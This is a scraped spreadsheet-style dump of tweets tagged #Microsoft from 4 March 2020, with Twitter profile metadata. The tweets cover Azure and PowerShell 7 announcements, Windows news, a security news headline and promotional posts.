    <t>{'id': 1116143157853351936, 'id_str': '1116143157853351936', 'name': 'Ludovic R.', 'screen_name': '_PrivacyCanada', 'location': 'Ontario, CA', 'description': 'Security analyst and researcher. Life-long FLOSS advocate. For publishing and consulting inquiries, please reach me at ludovic@privacycanada.net.', 'url': 'https://t.co/PlGj6YdwpG', 'entities': {'url': {'urls': [{'url': 'https://t.co/PlGj6YdwpG', 'expanded_url': 'http://privacycanada.net/', 'display_url': 'privacycanada.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 40, 'friends_count': 52, 'listed_count': 1, 'created_at': 'Thu Apr 11 00:57:20 +0000 2019', 'favourites_count': 44, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1686, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1116143820658184192/xmdxUQea_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1116143820658184192/xmdxUQea_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1116143157853351936/1555423976',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</si>
  <si>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18:47:03 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Reveals a New Design for the Windows 10 Start Menu
https://t.co/UUMnWffrWc https://t.co/l2RS2ZIGtZ</t>
  </si>
  <si>
    <t>Wed Mar 04 18:46:13 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/M3rauRlO9e LIVE NOW!! Come join us on minecraft would love to see you there, so why not come by and say hi!! #SupportSmallStreamers #SupportSmallerStreams #twitch #microsoft #livenow #OnAir #minecraft #PS4 #Youtube #twitchstreamer #twitchaffiliate #TwitchPrime</t>
  </si>
  <si>
    <t>{'id': 3362673381, 'id_str': '3362673381', 'name': 'Brandoning_FoxArmy', 'screen_name': 'INGERS_FC', 'location': '', 'description': 'Brandon here! Love to play football! Also a streamer on twitch: https://t.co/3O78BLk2WAâ€¦ \nPositive vibes only no hate needed! #NFFC Season Ticket Holder!! COYR', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/3O78BLk2WA', 'expanded_url': 'http://twitch.tv/brandoning_fox', 'display_url': 'twitch.tv/brandoning_fox', 'indices': [64, 87]}]}}, 'protected': False, 'followers_count': 96, 'friends_count': 247, 'listed_count': 1, 'created_at': 'Mon Jul 06 17:06:02 +0000 2015', 'favourites_count': 3565, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 579,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'http://pbs.twimg.com/profile_images/1226540048671236096/G8oj_AmI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1226540048671236096/G8oj_AmI_normal.jpg',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</si>
  <si>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18:46:05 +0000 2020</t>
  </si>
  <si>
    <t>February in HLS - Teams, Live Events, AI, Power BI, Data Protection and Clinical Industry Experts! https://t.co/YkiS78rGeJ #microsoft #microsoftteams #microsoftstream #healthcare</t>
  </si>
  <si>
    <t>Wed Mar 04 18:45:21 +0000 2020</t>
  </si>
  <si>
    <t>YOTNM Ep. 2: March is Colorectal Cancer Awareness month https://t.co/kOFwg2lMPX #microsoft #healthcare</t>
  </si>
  <si>
    <t>Wed Mar 04 18:45:11 +0000 2020</t>
  </si>
  <si>
    <t>How #Security Leaders at Starbucks and #Microsoft Prepare for #Breaches https://t.co/oeVb5lWnk7 #DarkReading</t>
  </si>
  <si>
    <t>Wed Mar 04 18:44:07 +0000 2020</t>
  </si>
  <si>
    <t>#RedHat + #Microsoft = Better together https://t.co/cVCTaHUvJ9 #Azure #Cloud #Developers #MSDevIRL</t>
  </si>
  <si>
    <t>{'id': 15567647, 'id_str': '15567647', 'name': 'Juarez Junior', 'screen_name': 'juarezjunior', 'location': 'Ireland', 'description': '@Azure Developer Relations Lead @Microsoft @MSdevIRL | #Blockchain #Java ðŸ¥‘ Invite me to speak about #Azure #Blockchain #Java #EmergingTechnologies', 'url': 'https://t.co/yVhxauDFZK', 'entities': {'url': {'urls': [{'url': 'https://t.co/yVhxauDFZK', 'expanded_url': 'https://www.linkedin.com/in/jujunior', 'display_url': 'linkedin.com/in/jujunior', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2863, 'friends_count': 4967, 'listed_count': 766, 'created_at': 'Wed Jul 23 17:25:11 +0000 2008', 'favourites_count': 11132, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 19581,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'http://pbs.twimg.com/profile_images/1066318177188147201/Z6TU0sRx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1066318177188147201/Z6TU0sRx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/15567647/1488057416',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</si>
  <si>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18:44:02 +0000 2020</t>
  </si>
  <si>
    <t>A #phishing campaign leveraged #Microsoft OneNote to bypass detection tools and download the Agent Tesla malware onto victims systems.
https://t.co/8RKS9t97Fi</t>
  </si>
  <si>
    <t>{'id': 18789893, 'id_str': '18789893', 'name': 'Threatpost', 'screen_name': 'threatpost', 'location': '', 'description': 'Threatpost is the first stop for fast-breaking security news, conversations and analysis from around the world.', 'url': 'http://t.co/rD9Wvdqf3e', 'entities': {'url': {'urls': [{'url': 'http://t.co/rD9Wvdqf3e', 'expanded_url': 'http://www.threatpost.com', 'display_url': 'threatpost.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 184670, 'friends_count': 6413, 'listed_count': 5058, 'created_at': 'Fri Jan 09 03:02:19 +0000 2009', 'favourites_count': 416, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 19503, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'B1AFAF', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/486945231112130560/O8QbtThI_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/486945231112130560/O8QbtThI_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18789893/1539283146',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</si>
  <si>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Wed Mar 04 18:42:29 +0000 2020</t>
  </si>
  <si>
    <t>Powershell 7.0 released in GA! #powershell #Microsoft https://t.co/kqGKGrYJPN</t>
  </si>
  <si>
    <t>{'id': 1224778853941436416, 'id_str': '1224778853941436416', 'name': 'whatabout.cloud', 'screen_name': 'whatabout_cloud', 'location': 'Sweden', 'description': '', 'url': 'https://t.co/J7cG7q0W5r', 'entities': {'url': {'urls': [{'url': 'https://t.co/J7cG7q0W5r', 'expanded_url': 'https://whatabout.cloud', 'display_url': 'whatabout.cloud', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 5, 'listed_count': 0, 'created_at': 'Tue Feb 04 19:36:58 +0000 2020', 'favourites_count': 3,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'http://pbs.twimg.com/profile_images/1224779195273924608/Vrz6C33-_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1224779195273924608/Vrz6C33-_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1224778853941436416/1580845185',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</si>
  <si>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18:42:24 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/gMHHlQkdve #microsoft #cloud #Announcements #Storage, Backup &amp;amp; Recovery #Management #Monitoring https://t.co/PW0B3M3dbU</t>
  </si>
  <si>
    <t>{'id': 36984635, 'id_str': '36984635', 'name': 'Don Pistulka (Microsoft)', 'screen_name': 'DonPistulka', 'location': 'United States', 'description': 'Microsoft Identity and Security Specialist. #modernworkplace , #modernsecurity , Tech Junkie, Cyber Security, Fantasy Football, Animals, Sports, and Travel', 'url': 'https://t.co/4OhirgHvBV', 'entities': {'url': {'urls': [{'url': 'https://t.co/4OhirgHvBV', 'expanded_url': 'http://wefollow.com/DonPistulka', 'display_url': 'wefollow.com/DonPistulka', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 328, 'friends_count': 1055, 'listed_count': 34, 'created_at': 'Fri May 01 16:47:41 +0000 2009', 'favourites_count': 26, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6567,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'http://pbs.twimg.com/profile_images/1099403688999714816/nSJk0RDK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1099403688999714816/nSJk0RDK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/36984635/1573530990', 'profile_link_color': 'FF691F',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</si>
  <si>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Wed Mar 04 18:42:18 +0000 2020</t>
  </si>
  <si>
    <t>Azure Cosmos DB free tier is now available  https://t.co/1QAJpHlVFJ   #Azure #Microsoft #Cloud #Roadmap  #azureflashnews</t>
  </si>
  <si>
    <t>Backup Reports is now in preview  https://t.co/o3RAetqIIQ   #Azure #Microsoft #Cloud #Roadmap  #azureflashnews</t>
  </si>
  <si>
    <t>Updates to Azure HDInsight  https://t.co/MQ8lf2bc5C   #Azure #Microsoft #Cloud #Roadmap  #azureflashnews</t>
  </si>
  <si>
    <t>Virtual machine scale sets now simpler to manage  https://t.co/bDkTeKeAK7   #Azure #Microsoft #Cloud #Roadmap  #azureflashnews</t>
  </si>
  <si>
    <t>Azure FunctionsSupport for custom language workers over HTTP is now in preview  https://t.co/3lW9LCo8aC   #Azure #Microsoft #Cloud #Roadmap  #azureflashnews</t>
  </si>
  <si>
    <t>Active Directory for authentication on SMB access to Azure File in preview  https://t.co/84ZSJsEhdq   #Azure #Microsoft #Cloud #Roadmap  #azureflashnews</t>
  </si>
  <si>
    <t>New features in Azure Cosmos DB Jupyter notebooks are now in preview  https://t.co/MVfWew7F3l   #Azure #Microsoft #Cloud #Roadmap  #azureflashnews</t>
  </si>
  <si>
    <t>Data Factory adds Flatten transformation, single-row lookups, and updated UI for container activities  https://t.co/ejykw79R6O   #Azure #Microsoft #Cloud #Roadmap  #azureflashnews</t>
  </si>
  <si>
    <t>PowerShell 7.0 is now generally available  https://t.co/fEhRJ12ktk   #Azure #Microsoft #Cloud #Roadmap  #azureflashnews</t>
  </si>
  <si>
    <t>#Microsoft announces generally available release of #PowerShell 7.0 #PowerShell7 
See: https://t.co/jMsYTiyjfC</t>
  </si>
  <si>
    <t>{'id': 37683956, 'id_str': '37683956', 'name': 'Shawn Brink', 'screen_name': 'Shawn_Brink_MVP', 'location': '', 'description': 'Microsoft Windows Insider MVP', 'url': 'https://t.co/489KgMa5B0', 'entities': {'url': {'urls': [{'url': 'https://t.co/489KgMa5B0', 'expanded_url': 'http://www.tenforums.com', 'display_url': 'tenforums.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 292, 'friends_count': 112, 'listed_count': 26, 'created_at': 'Mon May 04 15:33:38 +0000 2009', 'favourites_count': 53, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8878, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '1F1F1F', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme5/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme5/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/611484702566789120/GsfI2Zbw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/611484702566789120/GsfI2Zbw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/37683956/1507681150', 'profile_link_color': '150DFC', 'profile_sidebar_border_color': '989E90', 'profile_sidebar_fill_color': 'EBE4E4', 'profile_text_color': '423C8F', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 18:41:53 +0000 2020</t>
  </si>
  <si>
    <t>#Chainlink and #Microsoft=.  $link + #msft = .   #link . #crytocurrency https://t.co/upP86ehDKl</t>
  </si>
  <si>
    <t>{'id': 1117961878704201728, 'id_str': '1117961878704201728', 'name': 'Javier Vazquez', 'screen_name': 'JavierV12588842', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 44, 'friends_count': 245, 'listed_count': 1, 'created_at': 'Tue Apr 16 01:24:17 +0000 2019', 'favourites_count': 128, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 220, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1117962222326755328/P78gMK5e_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1117962222326755328/P78gMK5e_normal.jpg',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</si>
  <si>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18:39:54 +0000 2020</t>
  </si>
  <si>
    <t>Why is it still impossible to open two @Office Excel sheets with the same name in 2020. Can an expert tell me why?
#Microsoft #Excel</t>
  </si>
  <si>
    <t>{'id': 300167780, 'id_str': '300167780', 'name': 'Amine', 'screen_name': 'KounisTou', 'location': 'Tunisia/Austria', 'description': 'I like cars and guitars. Software engineer from Tunisia, living in the green heart of Austria.\n\n\nØªÙˆÙ†Ø³/Ø§Ù„Ù†Ù‘Ù…Ø³Ø§', 'url': 'https://t.co/Rkgsr7nPFk', 'entities': {'url': {'urls': [{'url': 'https://t.co/Rkgsr7nPFk', 'expanded_url': 'http://www.ebeasts.com', 'display_url': 'ebeasts.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 229, 'friends_count': 308, 'listed_count': 9, 'created_at': 'Tue May 17 09:44:05 +0000 2011', 'favourites_count': 17049, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6413,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'http://pbs.twimg.com/profile_images/1206341558053883906/o18GWK_O_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1206341558053883906/o18GWK_O_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/300167780/1565336998',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</si>
  <si>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18:39:19 +0000 2020</t>
  </si>
  <si>
    <t>#Cortana reborn: #Microsoft's digital assistant becomes less about #Alexa, more a productivity app
#IntegratedMarketingPlatform #Canada #UnitedStates https://t.co/ALNX1t6xKl</t>
  </si>
  <si>
    <t>{'id': 2696355324, 'id_str': '2696355324', 'name': 'Integrated Marketing Platform', 'screen_name': 'Integrated_M', 'location': 'Global', 'description': '#Marketing #Strategy #Media #Communication #Technology #Digital #Social #Search #Web #Mobile #DOOH #IntegratedMarketing â–º info @ integratedmarketing (dot) pro', 'url': 'https://t.co/t75CFHUGtp', 'entities': {'url': {'urls': [{'url': 'https://t.co/t75CFHUGtp', 'expanded_url': 'http://www.IntegratedMarketing.pro', 'display_url': 'IntegratedMarketing.pro', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1468, 'friends_count': 4984, 'listed_count': 11, 'created_at': 'Thu Jul 31 18:50:10 +0000 2014', 'favourites_count': 2641, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 10140,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'http://pbs.twimg.com/profile_images/1138834189413781504/9a_H2yE1_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1138834189413781504/9a_H2yE1_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2696355324/1558182386',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</si>
  <si>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18:34:46 +0000 2020</t>
  </si>
  <si>
    <t>@maryjofoley Thanks Mary.  It's going to be an on-going battle.  #Microsoft really needs every Windows admin on the planet to join some kind of distribution list so we could send-all that thing once and a while.
Just think of the reply-all storms!</t>
  </si>
  <si>
    <t>{'id': 798994123222978560, 'id_str': '798994123222978560', 'name': 'Bryan Dam', 'screen_name': 'bdam555', 'location': 'Grand Rapids, MI', 'description': 'Configuration Manager architect with a background in software development.', 'url': 'https://t.co/HR048anGMk', 'entities': {'url': {'urls': [{'url': 'https://t.co/HR048anGMk', 'expanded_url': 'https://damgoodadmin.com', 'display_url': 'damgoodadmin.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2273, 'friends_count': 157, 'listed_count': 40, 'created_at': 'Wed Nov 16 21:00:18 +0000 2016', 'favourites_count': 2249, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4515, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/963259154642030592/TExQ_qkQ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/963259154642030592/TExQ_qkQ_normal.jpg',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</si>
  <si>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18:33:22 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft's PowerShell 7 is generally available https://t.co/OdZa3lZPww #ZDNet #Microsoft</t>
  </si>
  <si>
    <t>Wed Mar 04 18:32:04 +0000 2020</t>
  </si>
  <si>
    <t>Who's into free paypal? #Microsoft</t>
  </si>
  <si>
    <t>Wed Mar 04 18:31:28 +0000 2020</t>
  </si>
  <si>
    <t>With my 22 years of experience, starting from no mobile to pager to mobile, smartphone, AI,BI to robotics. Want to help mnc with my EQ and IQ differences.. any takers.. u won't regret.. #Microsoft  #Oracle #BillGates  #mncs #indianmnc</t>
  </si>
  <si>
    <t>{'id': 586310375, 'id_str': '586310375', 'name': 'Jay', 'screen_name': 'imjayvardhan', 'location': 'Pune, Maharashtra', 'description': 'Software Project Delivery Management expert for APAC.\nTweets are personal.', 'url': 'http://t.co/LvEsCFYa4u', 'entities': {'url': {'urls': [{'url': 'http://t.co/LvEsCFYa4u', 'expanded_url': 'http://www.linkedin.com/in/jayvardhan', 'display_url': 'linkedin.com/in/jayvardhan', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 114, 'friends_count': 166, 'listed_count': 1, 'created_at': 'Mon May 21 06:43:00 +0000 2012', 'favourites_count': 18, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 313,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'http://pbs.twimg.com/profile_images/599205809390686208/bltrHzLF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/599205809390686208/bltrHzLF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/586310375/1436170340', 'profile_link_color': '4A913C', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '95E8EC', 'profile_text_color': '3C3940', 'profile_use_background_image': False, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 18:31:17 +0000 2020</t>
  </si>
  <si>
    <t>Watch how @wildandwolf went from a reactive company that put out fires to proactively anticipating and acting on the needs of their customers.    #MSDyn365 #Microsoft #Technology #IT #BusinessAutomation https://t.co/qPD398jkiu</t>
  </si>
  <si>
    <t>Wed Mar 04 18:24:10 +0000 2020</t>
  </si>
  <si>
    <t>Virtual machine scale sets now simpler to manage  https://t.co/LC7QsY9LVP  #azure #microsoft</t>
  </si>
  <si>
    <t>PowerShell 7.0 is now generally available  https://t.co/SY6ospQdAp  #azure #microsoft</t>
  </si>
  <si>
    <t>New features in Azure Cosmos DB Jupyter notebooks are now in preview  https://t.co/AsKccmZQiX  #azure #microsoft</t>
  </si>
  <si>
    <t>Data Factory adds Flatten transformation, single-row lookups, and updated UI for container activities  https://t.co/t1y17w2Mf4  #azure #microsoft</t>
  </si>
  <si>
    <t>Active Directory for authentication on SMB access to Azure File in preview  https://t.co/GVXaPCUMcX  #azure #microsoft</t>
  </si>
  <si>
    <t>Backup Reports is now in preview  https://t.co/1rDy2qZ9B1  #azure #microsoft</t>
  </si>
  <si>
    <t>Wed Mar 04 18:23:08 +0000 2020</t>
  </si>
  <si>
    <t>Azure Cosmos DB free tier is now available
- 400 RU/s and 5 GB of storage for free for the lifetime of the account. 
#Azure #Microsoft #Cloud #Database #CosmosDB https://t.co/fUOB5bUut5</t>
  </si>
  <si>
    <t>{'id': 155477841, 'id_str': '155477841', 'name': 'Maurice', 'screen_name': 'K0KK13', 'location': 'LocalHost', 'description': 'â˜ï¸ Cloud Consultant. ðŸ”„ DevOps. ðŸ¤– Automation Enthousiast. ðŸ‘¨ðŸ»\u200dðŸ’» IT Nerd.', 'url': 'https://t.co/uBhwW7ujNu', 'entities': {'url': {'urls': [{'url': 'https://t.co/uBhwW7ujNu', 'expanded_url': 'http://bit.ly/2lFMlBx', 'display_url': 'bit.ly/2lFMlBx', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 103, 'friends_count': 179, 'listed_count': 32, 'created_at': 'Mon Jun 14 07:12:15 +0000 2010', 'favourites_count': 82, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1149292774635823104/yzB_RD1H_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1149292774635823104/yzB_RD1H_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/155477841/1513715537',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</si>
  <si>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18:20:56 +0000 2020</t>
  </si>
  <si>
    <t>Windows Spotlight Images, cool photos for backgrounds and more #Microsoft #Windows #PowerShell https://t.co/M3xMMJOimB https://t.co/sK4hAQipss</t>
  </si>
  <si>
    <t>{'id': 1126140864684797953, 'id_str': '1126140864684797953', 'name': 'dhb-scripting.com', 'screen_name': 'dhbscripting', 'location': 'United States', 'description': 'An interesting place to communicate with IT professionals and staff to discuss and resolve your technology issues in ways that you may have never considered.', 'url': 'https://t.co/9ofjnGlhKa', 'entities': {'url': {'urls': [{'url': 'https://t.co/9ofjnGlhKa', 'expanded_url': 'https://dhb-scripting.com', 'display_url': 'dhb-scripting.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 21, 'friends_count': 61, 'listed_count': 0, 'created_at': 'Wed May 08 15:04:39 +0000 2019', 'favourites_count': 26, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 26, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1235267787272093698/noBwCbfE_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235267787272093698/noBwCbfE_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1126140864684797953/1583345766',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</si>
  <si>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18:19:14 +0000 2020</t>
  </si>
  <si>
    <t>FT led by Mr. Sakowicz &amp;amp; Donna Sakowicz (40 yr. retired MDCPS educator) to Microsoft Store where students engaged in Coding and AP level academics #Coding #Microsoft #Minecraft https://t.co/tcvNFcGwfT</t>
  </si>
  <si>
    <t>{'id': 3046927667, 'id_str': '3046927667', 'name': 'Felix Varela Senior', 'screen_name': 'FelixVarelaHS', 'location': '', 'description': 'Felix Varela Senior High School', 'url': 'https://t.co/K9QlcKwVxT', 'entities': {'url': {'urls': [{'url': 'https://t.co/K9QlcKwVxT', 'expanded_url': 'http://www.varelahighschool.org', 'display_url': 'varelahighschool.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1761, 'friends_count': 55, 'listed_count': 9, 'created_at': 'Fri Feb 20 14:34:32 +0000 2015', 'favourites_count': 191, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1805,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'http://pbs.twimg.com/profile_images/1195420346632945665/3QnxLu_W_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1195420346632945665/3QnxLu_W_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3046927667/1543437665',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</si>
  <si>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18:16:22 +0000 2020</t>
  </si>
  <si>
    <t>Check out our blog to read about the latest Microsoft App consumers are calling outstanding and urging everyone to install.
https://t.co/zjjBlEAbfQ
#Microsoft #blog</t>
  </si>
  <si>
    <t>{'id': 229926153, 'id_str': '229926153', 'name': 'Bay Pointe Technology', 'screen_name': 'Baypointetech', 'location': 'Richfield, OH', 'description': 'Award Winning, 22+ years of Managed IT Services, Network Security, Cloud Computing, On-Site Hardware Maintenance, VOIP, IT Projects, Hardware and Software.', 'url': 'https://t.co/FzqD9Em5Xc', 'entities': {'url': {'urls': [{'url': 'https://t.co/FzqD9Em5Xc', 'expanded_url': 'https://www.baypointetechnology.com/', 'display_url': 'baypointetechnology.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 123, 'friends_count': 222, 'listed_count': 11, 'created_at': 'Thu Dec 23 18:40:51 +0000 2010', 'favourites_count': 7, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 953, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '4F57B0', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1133808470216593409/VqZyrcAR_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1133808470216593409/VqZyrcAR_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/229926153/1578415311', 'profile_link_color': '44494F', 'profile_sidebar_border_color': '53AEDB', 'profile_sidebar_fill_color': '4F73B3', 'profile_text_color': '91C8F2', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 18:15:12 +0000 2020</t>
  </si>
  <si>
    <t>#News #Computing #Microsoft Surface Neo: Everything you need to know about Microsofts first dual-screen PC https://t.co/ObqwfKrzYQ https://t.co/kKFacxEETI</t>
  </si>
  <si>
    <t>{'id': 18503129, 'id_str': '18503129', 'name': 'AIVAnet', 'screen_name': 'aivanet', 'location': 'Athens, Greece', 'description': '', 'url': 'http://t.co/d3TYk0Qa0l', 'entities': {'url': {'urls': [{'url': 'http://t.co/d3TYk0Qa0l', 'expanded_url': 'http://www.aivanet.com', 'display_url': 'aivanet.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 403, 'friends_count': 8, 'listed_count': 301, 'created_at': 'Wed Dec 31 09:16:30 +0000 2008', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 240609,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'http://pbs.twimg.com/profile_images/3657506348/8e8abee9de29e1154ac483bc2fbb4fd0_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3657506348/8e8abee9de29e1154ac483bc2fbb4fd0_normal.png', 'profile_link_color': '2FC2EF', 'profile_sidebar_border_color': '181A1E', 'profile_sidebar_fill_color': '252429', 'profile_text_color': '9C9C9C', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 18:15:05 +0000 2020</t>
  </si>
  <si>
    <t>Virtual machine scale sets now simpler to manage  https://t.co/bDkTeKeAK7  #Azure #Microsoft #Cloud #azureflashnews</t>
  </si>
  <si>
    <t>Azure Cosmos DB free tier is now available  https://t.co/1QAJpHlVFJ  #Azure #Microsoft #Cloud #azureflashnews</t>
  </si>
  <si>
    <t>Backup Reports is now in preview  https://t.co/o3RAetqIIQ  #Azure #Microsoft #Cloud #azureflashnews</t>
  </si>
  <si>
    <t>New features in Azure Cosmos DB Jupyter notebooks are now in preview  https://t.co/MVfWew7F3l  #Azure #Microsoft #Cloud #azureflashnews</t>
  </si>
  <si>
    <t>Active Directory for authentication on SMB access to Azure File in preview  https://t.co/84ZSJsEhdq  #Azure #Microsoft #Cloud #azureflashnews</t>
  </si>
  <si>
    <t>Azure FunctionsSupport for custom language workers over HTTP is now in preview  https://t.co/3lW9LCo8aC  #Azure #Microsoft #Cloud #azureflashnews</t>
  </si>
  <si>
    <t>Updates to Azure HDInsight  https://t.co/MQ8lf2bc5C  #Azure #Microsoft #Cloud #azureflashnews</t>
  </si>
  <si>
    <t>PowerShell 7.0 is now generally available  https://t.co/fEhRJ12ktk  #Azure #Microsoft #Cloud #azureflashnews</t>
  </si>
  <si>
    <t>Data Factory adds Flatten transformation, single-row lookups, and updated UI for container activities  https://t.co/ejykw79R6O  #Azure #Microsoft #Cloud #azureflashnews</t>
  </si>
  <si>
    <t>Wed Mar 04 18:14:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft teases new #Windows10 Start menu that de-emphasizes Live Tiles https://t.co/2rEqVNj22x #tech #SankalpIT</t>
  </si>
  <si>
